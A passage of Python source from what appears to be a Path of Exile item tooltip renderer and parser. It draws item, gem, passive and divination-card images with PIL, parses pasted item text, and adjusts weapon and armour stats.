self.prop("Damage Effectiveness: ", f"{item.stats_per_level[0]['damage effectiveness']}%", None)
)
stats.append(separator)
elif item.base == 'Prophecy':
if len(item.lore.split(' ')) > 7:
lore = item.lore.split(' ')
sep_lore = [lore[x:x + 7] for x in range(0, len(lore), 7)]
for line in sep_lore:
stats.append(self.prop('Lore', ' '.join(line), UNIQUE_COLOR))
else:
stats.append(self.prop('Lore', item.lore, UNIQUE_COLOR))
stats.append(separator)
obj_list, matches = unescape_to_list(item.objective, ret_matches=True)
if 'while holding' in obj_list[0]:
item_name = matches[3].split('|')[1].strip(']]')
pre_holding = obj_list[0].split(' while holding ')[0]
new_obj = f"{pre_holding} while holding {item_name}"
else:
new_obj = obj_list[0]
if len(new_obj.split(' ')) > 7:
obj_split = new_obj.split(' ')
obj_sep = [obj_split[x:x + 7] for x in range(0, len(obj_split), 7)]
for line in obj_sep:
stats.append(self.prop(' '.join(line), '', None))
else:
stats.append(self.prop(new_obj, '', None))
stats.append(separator)
stats.append(self.prop("Seal Cost: ", item.seal_cost, DESC_COLOR))
if item.requirements.has_reqs and item.base != "Prophecy":
reqs = {}
if item.requirements.level:
reqs['level'] = item.requirements.level
if item.requirements.str:
reqs['str'] = item.requirements.str
if item.requirements.dex:
reqs['dex'] = item.requirements.dex
if item.requirements.int:
reqs['int'] = item.requirements.int
stats.append(self.prop("Requires", reqs, None))
stats.append(separator)
try:
if item.enchant:
for enchant in item.enchant:
stats.append(self.prop(enchant, '', CRAFTED))
stats.append(separator)
except AttributeError:
pass
if 'gem' in item.tags:
if len(item.description.split(' ')) > 7:
desc = item.description.split(' ')
description = [desc[x:x + 7] for x in range(0, len(desc), 7)]
for line in description:
stats.append(self.prop(' '.join(line), '', GEM_COLOR))
else:
stats.append(self.prop(item.description, '', GEM_COLOR))
stats.append(separator)
if item.quality_bonus:
stats.append(self.prop("Per 1% Quality:", "", DESC_COLOR))
if '<br>' in item.quality_bonus:
for bonus in item.quality_bonus.split('<br>'):
stats.append(self.prop(bonus, "", PROP_COLOR))
else:
stats.append(self.prop(item.quality_bonus, "", PROP_COLOR))
stats.append(separator)
stat_text = item.stat_text.split("<br>")
for stat in stat_text:
if len(stat.split(' ')) > 7:
st = stat.split(' ')
sep_stat = [st[x:x + 7] for x in range(0, len(st), 7)]
for sep in sep_stat:
stats.append(self.prop(' '.join(sep), "", PROP_COLOR))
else:
stats.append(self.prop(stat, "", PROP_COLOR))
stats.append(separator)
stats.append(self.prop("Gem Help", "Place into an item socket of the right", DESC_COLOR))
stats.append(self.prop("Gem Help", "colour to gain this skill. Right click to", DESC_COLOR))
stats.append(self.prop("Gem Help", "remove from a socket.", DESC_COLOR))
if 'gem' not in item.tags and item.base != "Prophecy":
if item.implicits:
implicits = unescape_to_list(item.implicits)
else:
implicits = None
if item.explicits:
explicits = unescape_to_list(item.explicits)
else:
explicits = None
if explicits and explicits[0].startswith('{'):
implicits = [explicits[0]]
explicits.pop(0)
if implicits:
for implicit in implicits:
if "{crafted}" in implicit or "(enchant)" in implicit:
stats.append(self.prop(implicit.replace('{crafted}', '').replace('(enchant)', ''),
'', CRAFTED))
stats.append(separator)
else:
stats.append(self.prop(implicit.replace('(implicit)', ''), '', PROP_COLOR))
stats.append(separator)
if explicits:
for explicit in explicits:
if explicit.lower() == "corrupted":
stats.append(self.prop(explicit, '', CORRUPTED))
elif "(crafted)" in explicit or "{crafted}" in explicit:
stats.append(self.prop(explicit.replace('{crafted}', '').replace(' (crafted)', ''),
'', CRAFTED))
else:
stats.append(self.prop(explicit, '', PROP_COLOR))
if item.lore:
if stats[-1] is not separator:
stats.append(separator)
lore = self.prop('Lore', unescape_to_list(item.lore), UNIQUE_COLOR)
stats.append(lore)
if item.icon:
http = urllib3.PoolManager()
def ico(icon):
r = http.request('GET', icon, preload_content=False)
im = Image.open(BytesIO(r.read()))
im = im.convert('RGBA')
return im
try:
if item.skill_icon:
stats.append(self.prop('Image', ico(item.skill_icon), None))
except AttributeError:
pass
stats.append(self.prop('Image', ico(item.icon), None))
else:
if item.name:
stats.append(self.prop('', item.name, DESC_COLOR))
passive_type = None
if item.asc_class:
passive_type = f"{item.asc_class} Notable Passive Skill"
elif item.is_notable:
passive_type = "Notable Passive Skill"
elif item.is_keystone:
passive_type = "Keystone"
stats.append(self.prop(passive_type, '', NORMAL_COLOR))
for line in unescape_to_list(item.stat_text):
stats.append(self.prop(line, '', PROP_COLOR))
if item.icon:
http = urllib3.PoolManager()
def ico(icon):
r = http.request('GET', icon, preload_content=False)
im = Image.open(BytesIO(r.read()))
im = im.convert('RGBA')
return im
try:
# FIXME: unresolved attribute
if item.skill_icon:
stats.append(self.prop('Image', ico(item.skill_icon), None))
except AttributeError:
pass
stats.append(self.prop('Image', ico(item.icon), None))
if item.reminder_text:
lines = unescape_to_list(item.reminder_text)
for line in lines:
if len(line.split(' ')) > 7:
lore = line.split(' ')
sep_lore = [lore[x:x + 7] for x in range(0, len(lore), 7)]
for set_line in sep_lore:
stats.append(self.prop('Reminder', ' '.join(set_line), DESC_COLOR))
else:
stats.append(self.prop("Reminder", line, DESC_COLOR))
if item.flavor_text:
if len(item.flavor_text.split(' ')) > 7:
lore = item.flavor_text.split(' ')
sep_lore = [lore[x:x + 7] for x in range(0, len(lore), 7)]
for line in sep_lore:
stats.append(self.prop('Lore', ' '.join(line), UNIQUE_COLOR))
else:
stats.append(self.prop("Lore", item.flavor_text, UNIQUE_COLOR))
return stats
def render_divcard(self, card):
http = urllib3.PoolManager()
r = http.request('GET', card.card_art, preload_content=False)
art = Image.open(BytesIO(r.read()))
art = art.convert('RGBA')
item = Image.new('RGBA', self.div_frame.size, (255, 0, 0, 0))
cur = Cursor(self.div_frame.size[0] // 2)
cur.reset_x()
cur.move_x((art.size[0] // 2) * -1)
cur.move_y(47)
item.alpha_composite(art, cur.pos)
item.alpha_composite(self.div_frame, (0, 0))
cur.reset_x()
d = ImageDraw.Draw(item)
cur.y = 0
cur.move_y(20)
header_font = ImageFont.truetype(f'{_dir}//Fontin-SmallCaps.ttf', 20)
cur.move_x((header_font.getsize(card.name)[0] // 2) * -1)
d.text(cur.pos, card.name, fill='black', font=header_font)
cur.reset_x()
cur.x = 77
cur.y = 316
cur.move_x((self.font.getsize(card.stack_size)[0] // 2) * -1)
d.text(cur.pos, card.stack_size, fill=None, font=self.font)
cur.y = 384
cur.reset_x()
fill = flavor_color[card.reward_flavor]
cur.move_x((self.font.getsize(card.reward)[0] // 2) * -1)
d.text(cur.pos, card.reward, fill=fill, font=self.font)
cur.reset_x()
if card.is_corrupted:
cur.y = 384 + self.font.getsize(card.reward)[1] + 6
cur.move_x((self.font.getsize("Corrupted")[0] // 2) * -1)
d.text(cur.pos, "Corrupted", fill=CORRUPTED, font=self.font)
cur.reset_x()
cur.y = 536
first_lore = unescape_to_list(card.lore)
for first_line in first_lore:
text = first_line
if len(text.split(' ')) > 7:
lore = text.split(' ')
sep_lore = [lore[x:x + 7] for x in range(0, len(lore), 7)]
for line in sep_lore:
joined_line = ' '.join(line)
cur.move_y(STAT_SPACING)
cur.move_x((self.font.getsize(joined_line)[0] // 2) * -1)
d.text(cur.pos, joined_line, fill=UNIQUE_COLOR, font=self.lore_font)
cur.move_y(self.lore_font.getsize(joined_line)[1])
cur.reset_x()
else:
cur.move_y(STAT_SPACING)
cur.move_x((self.font.getsize(text)[0] // 2) * -1)
d.text(cur.pos, text, fill=UNIQUE_COLOR, font=self.lore_font)
cur.move_y(self.lore_font.getsize(text)[1])
cur.reset_x()
return item
def render(self, poe_item):
stats = self.sort_stats(poe_item)
fill = flavor_color[self.flavor]
try:
if self.header_font.getsize(poe_item.name) > self.header_font.getsize(poe_item.base):
header = poe_item.name
else:
header = poe_item.base
except (AttributeError, TypeError):
header = poe_item.name
box_size = self.calc_size(stats, header)
center_x = box_size[0] // 2
item = Image.new('RGBA', box_size, color='black')
cur = Cursor(center_x)
if not isinstance(poe_item, PassiveSkill):
try:
if poe_item.influences:
apply_influences = []
for influence in poe_item.influences:
if influence == "shaper":
apply_influences.append(self.shaper_badge)
elif influence == "elder":
apply_influences.append(self.elder_badge)
elif influence == "redeemer":
apply_influences.append(self.redeemer_badge)
elif influence == "crusader":
apply_influences.append(self.crusader_badge)
elif influence == "hunter":
apply_influences.append(self.hunter_badge)
elif influence == "warlord":
apply_influences.append(self.warlord_badge)
if poe_item.rarity.lower() in ['rare', 'unique', 'relic']:
self.namebar_left.alpha_composite(apply_influences[0], (8, 18))
if len(apply_influences) > 1:
self.namebar_right.alpha_composite(apply_influences[1], (9, 18))
else:
self.namebar_right.alpha_composite(apply_influences[0], (9, 18))
else:
self.namebar_left.alpha_composite(apply_influences[0], (4, 6))
if len(apply_influences) > 1:
self.namebar_right.alpha_composite(apply_influences[1], (1, 6))
else:
self.namebar_right.alpha_composite(apply_influences[0], (1, 6))
except AttributeError:
pass
item.paste(self.namebar_left, cur.pos)
cur.move_x(self.namebar_left.size[0])
transformed_namebar = self.namebar_trans.resize((item.size[0] - (self.namebar_left.size[0] * 2),
self.namebar_trans.size[1]))
item.paste(transformed_namebar, cur.pos)
cur.move_x(transformed_namebar.size[0])
item.paste(self.namebar_right, cur.pos)
cur.reset_x()
d = ImageDraw.Draw(item)
cur.move_y(8)
cur.move_x((self.header_font.getsize(poe_item.name)[0] // 2) * -1)
d.text(cur.pos, poe_item.name, fill=fill, font=self.header_font)
if not isinstance(poe_item, PassiveSkill):
cur.move_y(2 + self.header_font.getsize(poe_item.name)[1])
else:
cur.move_y(self.header_font.getsize(poe_item.name)[1] // 2)
cur.reset_x()
if not isinstance(poe_item, PassiveSkill):
if 'gem' not in poe_item.tags and poe_item.base != "Prophecy":
if poe_item.base not in poe_item.name:
cur.move_x((self.header_font.getsize(poe_item.base)[0] // 2) * -1)
d.text(cur.pos, poe_item.base, fill=fill, font=self.header_font)
cur.reset_x()
cur.y = 0
# FIXME: referenced before assignment
cur.move_y(transformed_namebar.size[1])
else:
pass
for stat in stats:
if stat.title == "Separator":
self.last_action = "Separator"
cur.move_x((self.separator.size[0] // 2) * -1)
cur.move_y(SEPARATOR_SPACING + 2)
item.paste(self.separator, cur.pos)
cur.reset_x()
elif stat.title == "Elemental Damage:":
stat_text = stat.title
for element in stat.text.keys():
stat_text += f" {stat.text[element]}"
cur.move_x((self.font.getsize(stat_text)[0] // 2) * -1)
cur.move_y(SEPARATOR_SPACING if self.last_action == "Separator" else STAT_SPACING)
d.text(cur.pos, stat.title, fill=DESC_COLOR, font=self.font)
cur.move_x(self.font.getsize(stat.title)[0])
for element in stat.text.keys():
d.text(cur.pos, f" {stat.text[element]}", fill=ELE_COLOR[element], font=self.font)
cur.move_x(self.font.getsize(f" {stat.text[element]}")[0])
cur.move_y(STAT_HEIGHT)
cur.reset_x()
self.last_action = ""
elif stat.title == "Requires":
text = stat.title
for attr in stat.text.keys():
text += f" {attr.title()} {stat.text[attr]}" \
f"{'' if list(stat.text.keys())[-1] == attr else ','}"
cur.move_y(0 if self.last_action == "Separator" else STAT_SPACING)
cur.move_x((self.font.getsize(text)[0] // 2) * -1)
d.text(cur.pos, stat.title, fill=DESC_COLOR, font=self.font)
cur.move_x(self.font.getsize(stat.title)[0])
for attr in stat.text.keys():
if attr == 'level':
d.text(cur.pos, f" {attr.title()}", fill=DESC_COLOR, font=self.font)
cur.move_x(self.font.getsize(f" {attr.title()}")[0])
attribute_final = f" {stat.text[attr]}" \
f"{'' if list(stat.text.keys())[-1] == attr else ','}"
d.text(cur.pos, attribute_final, font=self.font)
else:
d.text(cur.pos, f" {stat.text[attr]}", font=self.font)
cur.move_x(self.font.getsize(f" {stat.text[attr]}")[0])
attribute_final = f" {attr.title()}{'' if list(stat.text.keys())[-1] == attr else ','}"
d.text(cur.pos, attribute_final, font=self.font, fill=DESC_COLOR)
cur.move_x(self.font.getsize(attribute_final)[0])
cur.move_y(STAT_HEIGHT)
cur.reset_x()
self.last_action = ""
elif stat.title == "Lore" or stat.title == "Reminder":
if type(stat.text) is list:
for line in stat.text:
text = line
cur.move_y(SEPARATOR_SPACING if self.last_action == "Separator" else STAT_SPACING)
cur.move_x((self.font.getsize(text)[0] // 2) * -1)
d.text(cur.pos, text, fill=stat.color, font=self.lore_font)
cur.move_y(self.lore_font.getsize(text)[1])
cur.reset_x()
self.last_action = ""
else:
cur.move_y(SEPARATOR_SPACING if self.last_action == "Separator" else STAT_SPACING)
cur.move_x((self.font.getsize(stat.text)[0] // 2) * -1)
d.text(cur.pos, stat.text, fill=stat.color, font=self.lore_font)
cur.move_y(STAT_HEIGHT)
cur.reset_x()
elif stat.title == "Image" and not isinstance(poe_item, PassiveSkill):
cur.move_x((stat.text.size[0] // 2) * -1)
cur.move_y(4)
ic = stat.text
if not isinstance(poe_item, Gem) and 'shaper' in poe_item.influences:
ic = Image.alpha_composite(self.shaper_backgrounds[poe_item.size].resize(ic.size), ic)
if not isinstance(poe_item, Gem) and 'elder' in poe_item.influences:
ic = Image.alpha_composite(self.elder_backgrounds[poe_item.size].resize(ic.size), ic)
item.alpha_composite(ic, cur.pos)
cur.move_y(stat.text.size[1])
cur.reset_x()
elif stat.title == "Image" and isinstance(poe_item, PassiveSkill):
ic = stat.text
if poe_item.asc_class:
frame = self.ascendancy_frame
elif poe_item.is_keystone:
frame = self.keystone_frame
elif poe_item.is_notable:
frame = self.notable_frame
else:
frame = self.passive_frame
icl = round(math.sqrt((frame.size[0] ** 2) / 2))
old_s = ic.size[0]
ic = ic.resize((icl, icl))
cur.move_x((ic.size[0] // 2) * -1)
cur.move_y(30)
item.alpha_composite(ic, cur.pos)
cur.move_y(((old_s + 26 - ic.size[0]) // 2) * -1)
cur.reset_x()
cur.move_x((frame.size[0] // 2) * -1)
item.alpha_composite(frame, cur.pos)
cur.move_y(frame.size[1])
cur.reset_x()
elif stat.title == "Stored Uses":
text = f"Can Store {stat.text} Use(s)"
cur.move_y(SEPARATOR_SPACING if self.last_action == "Separator" else STAT_SPACING)
cur.move_x((self.font.getsize(text)[0] // 2) * -1)
d.text(cur.pos, "Can Store ", fill=DESC_COLOR, font=self.font)
cur.move_x(self.font.getsize("Can Store ")[0])
d.text(cur.pos, stat.text + " ", font=self.font)
cur.move_x(self.font.getsize(stat.text + " ")[0])
d.text(cur.pos, "Use(s)", fill=DESC_COLOR, font=self.font)
cur.reset_x()
elif stat.title == "Gem Help":
cur.move_y(SEPARATOR_SPACING if self.last_action == "Separator" else STAT_SPACING)
cur.move_x((self.font.getsize(stat.text)[0] // 2) * -1)
d.text(cur.pos, stat.text, fill=DESC_COLOR, font=self.lore_font)
cur.move_y(STAT_HEIGHT)
cur.reset_x()
elif stat.title == "Seal Cost: ":
coin = Image.open(f'{_dir}//silver_coin.png').convert('RGBA')
cur.move_y(SEPARATOR_SPACING if self.last_action == "Separator" else STAT_SPACING)
cur.move_x((self.font.getsize(stat.title)[0] // 2) * -1)
d.text(cur.pos, stat.title, fill=DESC_COLOR, font=self.font)
cur.move_y(STAT_HEIGHT + STAT_SPACING)
cur.reset_x()
sealtext = f"{stat.text}X Silver Coin"
cur.move_x((self.font.getsize(sealtext)[0] // 2) * -1)
d.text(cur.pos, f"{stat.text}X ", fill=NORMAL_COLOR, font=self.font)
cur.move_x(self.font.getsize(f"{stat.text}X ")[0])
item.alpha_composite(coin, cur.pos)
cur.move_x(coin.size[0] + 2)
d.text(cur.pos, "Silver Coin", fill=NORMAL_COLOR, font=self.font)
cur.move_y(STAT_HEIGHT)
cur.reset_x()
else:
text = f"{stat.title}{stat.text}"
cur.move_y(SEPARATOR_SPACING if self.last_action == "Separator" else STAT_SPACING)
cur.move_x((self.font.getsize(text)[0] // 2) * -1)
if ':' in stat.title:
d.text(cur.pos, stat.title, fill=DESC_COLOR, font=self.font)
cur.move_x(self.font.getsize(stat.title)[0])
d.text(cur.pos, str(stat.text), fill=stat.color, font=self.font)
else:
if stat.title.startswith('{'):
color = CRAFTED
else:
color = stat.color
d.text(cur.pos, stat.title, fill=color, font=self.font)
cur.move_y(STAT_HEIGHT)
cur.reset_x()
self.last_action = ""
item = ImageOps.expand(item, border=1, fill=fill)
return item
def parse_game_item(itemtext):
item = itemtext.split('\n')
groups = []
curr_group = []
for line in item:
if "---" in line:
groups.append(curr_group)
curr_group = []
else:
curr_group.append(line)
groups.append(curr_group)
pobitem = {'name': '', 'special': [], 'enchant': [],
'implicit': [], 'stats': [], 'quality': 0, 'type': "game"}
unmarked_blocks = 0
print(item, groups)
for group in groups:
if group[0].startswith('Rarity:'):
pobitem['rarity'] = group[0].split(' ')[1].title()
pobitem['base'] = group[len(group)-1]
if 'Superior' in pobitem['base']:
pobitem['base'] = pobitem['base'].replace('Superior ', '')
if 'Synthesised' in pobitem['base']:
# is there a special nature for Synthesised items?
# if yes: pobitem['special'].append('Synthesised Item')
pobitem['base'] = pobitem['base'].replace('Synthesised', '')
if len(group) > 2:
pobitem['name'] = group[1]
# defense
elif ( group[0].startswith('Quality') or
group[0].startswith('Map Tier:') or
group[0].startswith('Chance to Block:') or
group[0].startswith('Armour:') or
group[0].startswith('Evasion Rating:') or
group[0].startswith('Energy Shield:')):
for line in group:
if line.startswith('Quality:'):
pobitem['quality'] = line.replace('Quality: +', '').replace('% (augmented)', '')
elif ( line.startswith('Map Tier:') or
line.startswith('Item Quantity:') or
line.startswith('Item Rarity:') or
line.startswith('Monster Pack Size:') or
line.startswith('Atlas Region:')): # map stuff
pobitem['implicit'].append(line)
elif line.startswith('Quality ('): # catalysts
pobitem['implicit'].append(line)
# offense
elif group[len(group)-1].startswith('Attacks per Second:') or group[len(group)-1].startswith('Weapon Range:'):
# this filter is not trivial and not fully tested, due to large differences in weapon types and unique exceptions
# trivial solution would be to check for every weapon type in the game
pass
elif group[0].startswith('Requirements:'):
pass
elif group[0].startswith('Sockets:'):
pass
elif group[0].startswith('Item Level:'):
pass
elif group[0].startswith('Price:'):
pass
elif group[0].endswith('(enchant)'):
for line in group:
pobitem['enchant'].append(line.replace('(enchant)', ''))
elif group[0].endswith('(implicit)'):
for line in group:
pobitem['implicit'].append(line.replace('(implicit)', ''))
elif group[0].startswith('Corrupted'):
# should corrupted be an explicit?
pobitem['stats'].append('Corrupted')
elif group[0].endswith(' Item'):
for line in group:
pobitem['special'].append(line)
else: # unid is an explicit
# if (groups.index(group) < len(group)-1) or len(pobitem['stats']) == 0:
if (unmarked_blocks == 0):
unmarked_blocks += 1
print("appending stats")
for line in group:
print(line)
pobitem['stats'].append(line)
else: # flavor
pass
print(pobitem)
return {
'name': pobitem['name'], 'base': pobitem['base'], 'stats': pobitem['stats'], 'rarity': pobitem['rarity'],
'implicits': pobitem['implicit'], 'quality': pobitem['quality'], 'special': pobitem['special'],
'enchant': pobitem['enchant']
}
def parse_pob_item(itemtext):
if "Implicits: " not in itemtext:
print("not in")
return parse_game_item(itemtext)
item = itemtext.split('\n')
item = [line for line in item if "---" not in line]
qualtext = 0
variant = None
pobitem = {'special': [], 'enchant': "", 'type': None}
for index, line in enumerate(item):
if "{variant:" in line:
variant_now = line[line.index("t:") + 2:line.index("}")].split(',')
if variant not in variant_now:
item.pop(index)
continue
line = item[index] = line.split("}", 1)[1]
if "{range:" in line:
try:
percent = float(line[line.index("e:") + 2:line.index("}")])
except Exception:
pass
txt = line.split("}")[1]
matches = re_range.findall(txt)
for match in matches:
stat = match[1:-1]
if " to " in stat:
separator = stat.find(' to ', 1)
range_end = stat[separator + 4:]
else:
separator = stat.find('-', 1)
range_end = stat[separator + 1:]
range_start = stat[:separator]
if '.' in range_start or '.' in range_end:
# FIXME: referenced before assignment
calc_stat = float(percent * float(range_end))
else:
calc_stat = int(percent * float(range_end))
txt = txt.replace(match, str(calc_stat))
item[index] = txt
if line.startswith("Rarity"):
pobitem['rarity'] = line.split(' ')[1].title()
pobitem['rarity_index'] = index
continue
elif line.startswith("Selected Variant"):
variant = line.split(": ")[1]
continue
# elif line.startswith("Item Level"):
# pobitem['type'] = "game"
# if item[index + 3].startswith('--'):
# offset = 2
# if "(implicit)" not in item[index + offset]:
# pobitem['enchant'] = item[index + offset]
# offset = 4
# if "(implicit)" in item[index + offset]:
# pobitem['implicits'] = 0
# for line_inner in item[index + offset:]:
# print(line_inner)
# if "(implicit)" in line_inner:
# pobitem['implicits'] = pobitem['implicits'] + 1
# if "---" in line_inner:
# break
# pobitem['statstart_index'] = index + offset + pobitem['implicits']
# else:
# pobitem['statstart_index'] = index + offset
# else:
# pobitem['statstart_index'] = index + 2
elif line.startswith("====="):
pobitem['statstart_index'] = index
elif line.startswith("Implicits:") and 'implicits' not in pobitem:
pobitem['type'] = 'pob'
pobitem['implicits'] = int(line.split(': ')[1])
pobitem['statstart_index'] = index + pobitem['implicits']
elif "(enchant)" in line or "(implicit)" in line:
if 'implicits' not in pobitem:
pobitem['implicits'] = 1
else:
pobitem['implicits'] = pobitem['implicits'] + 1
pobitem['statstart_index'] = index
elif line.startswith("Requires"):
pobitem['statstart_index'] = index
elif line.startswith("Quality"):
try:
qualtext = line.split("+")[1].split(' ')[0].strip('%')
except IndexError:
pass
if "Shaper Item" in line:
pobitem['special'].append("Shaper Item")
if "Elder Item" in line:
pobitem['special'].append("Elder Item")
if "Crusader Item" in line:
pobitem['special'].append("Crusader Item")
if "Redeemer Item" in line:
pobitem['special'].append("Redeemer Item")
if "Warlord Item" in line:
pobitem['special'].append("Warlord Item")
if "Hunter Item" in line:
pobitem['special'].append("Hunter Item")
if pobitem['rarity'].lower() in ['unique', 'rare', 'relic']:
name = item[pobitem['rarity_index'] + 1]
base = item[pobitem['rarity_index'] + 2]
elif pobitem['rarity'].lower() == 'magic':
name = item[pobitem['rarity_index'] + 1]
if "Superior" in name:
name = name.replace("Superior", "").strip()
base = get_base_from_magic(name)
else:
name = item[pobitem['rarity_index'] + 1]
if "Superior" in name:
name = name.replace("Superior", "").strip()
base = name
if 'implicits' in pobitem and pobitem['implicits']:
if pobitem['type'] == 'game':
offset = 0
else:
offset = 1
implicits = item[:pobitem['statstart_index'] + offset][-1 * pobitem['implicits']:]
implicits = [implicit.replace('(implicit)', '') for implicit in implicits]
elif item[pobitem['statstart_index'] - 2].startswith('--') and 'Item Level' not in item[pobitem['statstart_index'] - 1]:
imp_end = "None"
for ind, stat in enumerate(item[pobitem['statstart_index'] - 1:]):
if stat.startswith('--'):
if item[pobitem['statstart_index'] - 1:][ind + 1] not in ['Shaper Item', 'Elder Item']:
imp_end = ind - 1
break
if imp_end != "None":
implicits = item[pobitem['statstart_index'] - 1:][0:imp_end]
else:
implicits = []
else:
implicits = []
stat_text = item[pobitem['statstart_index'] + 1:]
stat_text = [stat for stat in stat_text if not stat.startswith('--')
and not ":" in stat and stat]
if '(' in base and ')' in base:
base = base[:base.find('(') - 1]
if "Synthesised" in base:
base = base.replace("Synthesised", "").strip()
if "Synthesised" in name:
name = name.replace("Synthesised", "").strip()
print(implicits, stat_text)
return {
'name': name, 'base': base, 'stats': stat_text, 'rarity': pobitem['rarity'],
'implicits': implicits, 'quality': int(qualtext), 'special': pobitem['special'],
'enchant': pobitem['enchant']
}
def ensure_rangeless(stat):
if "-" in str(stat):
return stat.split('-')[0][1:]
return stat
def modify_base_stats(item):
stats = {
'flat es': 0, 'flat armour': 0, 'flat evasion': 0, 'inc es': int(item.quality),
'inc armour': int(item.quality), 'inc evasion': int(item.quality), 'aspd': 0,
'fire low': 0, 'fire max': 0, 'fire inc': 0, 'cold low': 0, 'cold max': 0,
'cold inc': 0, 'light low': 0, 'light max': 0, 'light inc': 0, 'chaos low': 0,
'chaos max': 0, 'chaos inc': 0, 'phys low': 0, 'phys max': 0, 'phys inc': int(item.quality),
'cc': 0, 'range': 0, 'block': 0
}
print(item.implicits, item.explicits)
if item.implicits:
for stat in unescape_to_list(item.implicits):
text = stat.lower().replace('{crafted}', '').replace('{fractured}', '')
if not any(c.isdigit() for c in text) or 'minion' in text or 'global' in text:
continue
if ' per ' in text or ' if ' in text or ',' in text:
continue
if " to " in text and "multiplier" not in text and ":" not in text:
if 'armour' in text and isinstance(item, Armour):
stats['flat armour'] += int(text.split(' ')[0][1:])
elif 'evasion rating' in text and isinstance(item, Armour):
stats['flat evasion'] += int(text.split(' ')[0][1:])
elif 'maximum energy shield' in text and isinstance(item, Armour):
stats['flat es'] += int(text.split(' ')[0][1:])
elif 'weapon range' in text and isinstance(item, Weapon):
stats['range'] += int(text.split(' ')[0][1:])
elif 'block' in text and 'spell damage' not in text and 'block recovery' not in text and \
"maximum" not in text:
stats['block'] += int(text.split(' ')[0][:-1])
if "damage" in text and "reflect" not in text and "converted" not in text and isinstance(item, Weapon):
k = None
if 'lightning' in text:
k = 'light'
if 'cold' in text:
k = 'cold'
if 'fire' in text:
k = 'fire'
if 'chaos' in text:
k = 'chaos'
if 'physical' in text:
k = 'phys'
if k:
stats[f'{k} low'] += int(text.split(' to ')[0].split(' ')[-1])
stats[f'{k} max'] += int(text.split(' to ')[1].split(' ')[0])
elif " increased " in text:
if "armour" in text and isinstance(item, Armour):
stats['inc armour'] += int(text.split(' ')[0][:-1])
if "evasion rating" in text and isinstance(item, Armour):
stats['inc evasion'] += int(text.split(' ')[0][:-1])
if "energy shield" in text and isinstance(item, Armour):
stats['inc es'] += int(text.split(' ')[0][:-1])
elif 'block' in text and 'block recovery' not in text and 'spell damage' not in text and \
"maximum" not in text:
stats['block'] += int(text.split(' ')[0][:-1])
if "attack speed" in text and isinstance(item, Weapon):
stats['aspd'] += int(text.split(' ')[0][:-1])
if text.lower().endswith("critical strike chance") and isinstance(item, Weapon):
stats['cc'] += int(text.split(' ')[0][:-1])
if "damage" in text and isinstance(item, Weapon):
if 'lightning' in text:
stats['light inc'] += int(text.split(' ')[0][:-1])
if 'cold' in text:
stats['cold inc'] += int(text.split(' ')[0][:-1])
if 'fire' in text:
stats['fire inc'] += int(text.split(' ')[0][:-1])
if 'chaos' in text:
stats['chaos inc'] += int(text.split(' ')[0][:-1])
if 'physical' in text:
stats['phys inc'] += int(text.split(' ')[0][:-1])
if item.explicits:
for stat in unescape_to_list(item.explicits):
text = stat.lower().replace('{crafted}', '').replace('{fractured}', '')
if not any(c.isdigit() for c in text) or 'minion' in text or 'global' in text:
continue
if ' per ' in text or ' if ' in text or ',' in text:
continue
if " to " in text and "multiplier" not in text and ":" not in text:
if 'armour' in text and isinstance(item, Armour):
stats['flat armour'] += int(text.split(' ')[0][1:])
elif 'evasion rating' in text and isinstance(item, Armour):
stats['flat evasion'] += int(text.split(' ')[0][1:])
elif 'maximum energy shield' in text and isinstance(item, Armour):
stats['flat es'] += int(text.split(' ')[0][1:])
elif 'weapon range' in text and isinstance(item, Weapon):
stats['range'] += int(text.split(' ')[0][1:])
elif 'block' in text and 'block recovery' not in text and 'spell damage' not in text \
and "maximum" not in text:
stats['block'] += int(text.split(' ')[0][:-1])
if "damage" in text and "reflect" not in text and "converted" not in text and isinstance(item, Weapon):
k = None
if 'lightning' in text:
k = 'light'
if 'cold' in text:
k = 'cold'
if 'fire' in text:
k = 'fire'
if 'chaos' in text:
k = 'chaos'
if 'physical' in text:
k = 'phys'
if k:
stats[f'{k} low'] += int(text.split(' to ')[0].split(' ')[-1])
stats[f'{k} max'] += int(text.split(' to ')[1].split(' ')[0])
elif " increased " in text:
if "armour" in text and isinstance(item, Armour):
stats['inc armour'] += int(text.split(' ')[0][:-1])
if "evasion rating" in text and isinstance(item, Armour):
stats['inc evasion'] += int(text.split(' ')[0][:-1])
if "energy shield" in text and isinstance(item, Armour):
stats['inc es'] += int(text.split(' ')[0][:-1])
elif 'block' in text and 'block recovery' not in text and 'spell damage' not in text:
stats['block'] += int(text.split(' ')[0][:-1])
if "attack speed" in text and isinstance(item, Weapon):
stats['aspd'] += int(text.split(' ')[0][:-1])
if text.lower().endswith("critical strike chance") and isinstance(item, Weapon):
stats['cc'] += int(text.split(' ')[0][:-1])
if "damage" in text and isinstance(item, Weapon):
if 'lightning' in text:
stats['light inc'] += int(text.split(' ')[0][:-1])
if 'cold' in text:
stats['cold inc'] += int(text.split(' ')[0][:-1])
if 'fire' in text:
stats['fire inc'] += int(text.split(' ')[0][:-1])
if 'chaos' in text:
stats['chaos inc'] += int(text.split(' ')[0][:-1])
if 'physical' in text:
stats['phys inc'] += int(text.split(' ')[0][:-1])
if 'weapon' in item.tags:
if stats['aspd']:
_as = float(ensure_rangeless(item.attack_speed))
item.attack_speed = f"{(_as + (stats['aspd'] / 100) * _as):.2}"
if stats['cc']:
print(item.critical_chance.split("%")[0], stats['cc'])
try:
cc = float(item.critical_chance.split("%")[0])
except:
cc = 5.0
cc += cc * (stats['cc'] / 100)
item.critical_chance = f"{cc:.2}%"
if stats['range']:
i_range = int(ensure_rangeless(item.range))
i_range += stats['range']
item.range = f"{i_range}"
if stats['fire max'] or stats['fire inc']:
if stats['fire max']:
item.fire_min = stats['fire low']
item.fire_max = stats['fire max']
fire_m = int(ensure_rangeless(item.fire_min))
fire_mx = int(ensure_rangeless(item.fire_max))
fire_m += fire_m * (stats['fire inc'] / 100)
fire_mx += fire_mx * (stats['fire inc'] / 100)
item.fire_min = str(round(fire_m))
item.fire_max = str(round(fire_mx))
if stats['cold max'] or stats['cold inc']:
if stats['cold max']:
item.cold_min = stats['cold low']
item.cold_max = stats['cold max']
cold_m = int(ensure_rangeless(item.cold_min))
cold_mx = int(ensure_rangeless(item.cold_max))
cold_m += cold_m * (stats['cold inc'] / 100)
cold_mx += cold_mx * (stats['cold inc'] / 100)
item.cold_min = str(round(cold_m))
item.cold_max = str(round(cold_mx))
if stats['light max'] or stats['light inc']:
if stats['light max']:
item.lightning_min = stats['light low']
item.lightning_max = stats['light max']
lightning_m = int(ensure_rangeless(item.lightning_min))
